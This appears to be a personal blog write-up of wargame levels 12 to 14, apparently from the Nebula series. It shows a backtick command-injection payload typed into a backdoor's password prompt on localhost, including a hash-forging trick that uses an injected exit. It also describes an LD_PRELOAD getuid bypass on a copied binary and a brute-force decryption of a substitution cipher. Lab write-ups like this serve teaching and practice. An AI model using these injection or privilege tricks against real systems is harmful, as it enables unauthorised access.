After quite some time of not doing much more than working at my new job & playing dota, I felt like taking it upon myself to complete some more exercises. I had trouble with level 11, but who cares?
There is a backdoor process listening on port 50001.
Here’s an excerpt from the code provided.
So, we get to put in text for the lua-script to pass into the
commandline, but we have to deal with that pesky pipe into
at the end. However, the solution is to use the help of our
old friend backticks to execute what we want.
$ telnet 127.0.0.1 50001 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. Password: `getflag` > /tmp/level12 Better luck next time Connection closed by foreign host. $ cat /tmp/flag12 You have successfully executed getflag on a target account
Bonus: Getting two birds stoned at once.
We can fool this lua-script to accept our bogus password as the real deal by adding one or two commands. All we need is the hash it’s looking for & a way to give it to the program.
$ cat << EOF > /tmp/level12 4754a4f4bd5787accd33de887b9250a0691dd198 EOF $ telnet 127.0.0.1 50001 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. Password: `cat /tmp/level12`; exit Congrats, your token is 413**CARRIER LOST** Connection closed by foreign host.
sh -c is fed the
exit command, it stops execution, resulting
in the trailing ` | sha1sum` dissappearing into the void. It’s not the point
of the exercise, but a neat thing I thought I’d share =)
There is a security check that prevents the program from continuing execution if the user invoking it does not match a specific user id.
Below is the provided C code.
Since we’re not root, we can’t change our
user-ID just like
that. I tried to use
LD_PRELOAD to change the function
only return 1000, but my plans were stopped in it’s tracks because
LD_PRELOAD is ignored by the loader if we’re trying to preload on a
executable we don’t own.
However, we can just make a copy of the executable & preload it with our
own version of
getuid, making our hard work & sweat worthwhile.
##About This program resides in /home/flag14/flag14. It encrypts input and writes it to standard output. An encrypted token file is also in that home directory, decrypt it :)
We have to pipe input into the process & pass along the
-e flag for
it to spit out encrypted stuff. I also added
&& echo since the
program does not add a newline character at the end.
Fair enough, but does the encryption change if we rerun it?
Turns out it doesn’t; we still get
hfnos if we run the program again
with the same input. That’s good to know, we don’t necesscarily have
to get lucky when we try to recover the used key.
If we feed the program alot of the same characters, the results indicate that the encryption is basically encrypting one character at a time, incrementing the substitution each time.
In order to decrypt the token, we just need to unroll the substitution, which is simple enough. All we need to know is how long the token is & what order characters are substituted.
The first character remains unchanged by the encryption, so if we loop through all ascii characters, we can map the order of substitution. I tried to throw down some quick & simple python code to decrypt the token; according to what I knew about the encryption so far.
The problem is that my decryption did not work. My guess is that there is something I’m missing, so I wrote a similar python script to bruteforce it instead.
In a nutshell, the code above iterates over all characters in
trying a substitution & reencryptning, comparing the reencrypted
ciphertext to the token. If the reencrypted string matches the token
so far, it just adds that decrypted character to the
variable & moves on to the next character in
token. If it doesn’t
match, the script modifies the
iv variable, meaning that in the next
iteration of our loop will try with another character from
With my bruteforcing script in place, all that was left was to
actually put all the pieces together & execute the flag as
Recommended stuff to watch & read in regards to this level.
There you have it, I’ve tried solving level15 & level16, but have been unable to, so far. This Unix shell exploiting is really tricky sometimes but it’s pretty fun trying to figure out what the fuck is going on.
Thanks for reading, I’ll maybe just switch over to their Protstar series of challenges, I’m not sure right now :)